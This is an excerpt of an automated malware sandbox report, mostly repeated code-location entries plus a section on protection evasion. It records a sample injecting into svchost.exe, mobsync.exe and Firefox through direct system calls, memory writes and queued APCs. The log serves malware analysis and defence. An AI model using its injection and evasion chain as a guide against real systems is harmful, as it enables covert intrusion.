                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]2_2_03530AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]2_2_03568A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03530887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03604F68 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D0F50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D4F42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003D81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003D8189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 4520
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread APC queued: target process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BBB008
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003EB106 LogonUserW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F74BB mouse_event
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
